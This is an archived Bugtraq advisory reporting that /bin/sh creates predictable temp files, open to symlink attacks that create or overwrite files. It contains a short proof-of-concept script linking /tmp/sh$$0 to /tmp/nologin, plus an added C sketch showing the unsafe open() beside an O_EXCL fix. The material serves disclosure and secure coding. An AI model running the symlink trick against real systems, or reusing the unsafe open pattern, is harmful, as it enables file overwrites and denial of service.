[17752] in bugtraq
/bin/sh creates insecure tmp files
daemon@ATHENA.MIT.EDU (Paul Szabo)
Thu Nov 23 18:26:02 2000
Message-ID: <200011230225.NAA19716@milan.maths.usyd.edu.au>
Date: Thu, 23 Nov 2000 13:25:28 +1100
Reply-To: Paul Szabo <psz@MATHS.USYD.EDU.AU>
From: Paul Szabo <psz@MATHS.USYD.EDU.AU>
To: BUGTRAQ@SECURITYFOCUS.COM

Similarly to the recently discussed tcsh vulnerability, the Bourne shell
/bin/sh also creates temporary files in an insecure way, and can be
exploited to create arbitrary files or to overwrite existing ones. While
this vulnerability can be exploited for a denial-of-service attack, it is
not clear how to use it to gain additional privileges.

I have confirmed this vulnerability in two (recent-version) commercial
UNIXes.

Demonstration:

#!/bin/sh -x
ls -l /tmp/nologin
ln -s /tmp/nologin /tmp/sh$$0
cat <<EOF
Only root can create /etc/nologin.
Do any boot-time scripts use sh?
EOF
ls -l /tmp/nologin

Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
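
Added example, not part of the original post and not taken from any vendor's sh source: a C sketch of why a predictable here-document temp name such as /tmp/sh$$0 is unsafe and how O_CREAT|O_EXCL closes the hole. The open() flags in open_tmp_unsafe are an assumed pattern consistent with the behaviour reported above; the file names are constructed and everything runs inside a private scratch directory.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed unsafe pattern: predictable name, no O_EXCL. open() follows a
 * symlink already sitting at `path` and creates or truncates its target. */
int open_tmp_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern: with O_CREAT|O_EXCL, open() fails with EEXIST if
 * anything exists at `path`, including a dangling symbolic link. */
int open_tmp_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Constructed scenario: a symlink occupies the temp name before the file
 * is opened. Returns 1 if the exclusive open refused the name and the
 * plain open created the link target, 0 otherwise, -1 on setup failure. */
int demo(void)
{
    char dir[] = "/tmp/shtmp-demo-XXXXXX";  /* private scratch directory */
    char lnk[128], target[128];
    struct stat st;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/sh12340", dir);  /* stands in for /tmp/sh$$0 */
    if (symlink(target, lnk) != 0) { rmdir(dir); return -1; }

    int fd = open_tmp_excl(lnk);
    int excl_refused = (fd == -1 && errno == EEXIST);
    if (fd != -1) close(fd);
    fd = open_tmp_unsafe(lnk);
    if (fd != -1) close(fd);
    int unsafe_created = (stat(target, &st) == 0);  /* target now exists */

    unlink(target); unlink(lnk); rmdir(dir);
    return excl_refused && unsafe_created;
}

int main(void)
{
    printf("O_EXCL refused, plain open followed link: %d\n", demo());
    return 0;
}
```

mkstemp(3) combines the exclusive open with an unpredictable name, so the file name cannot be pre-planted in the first place.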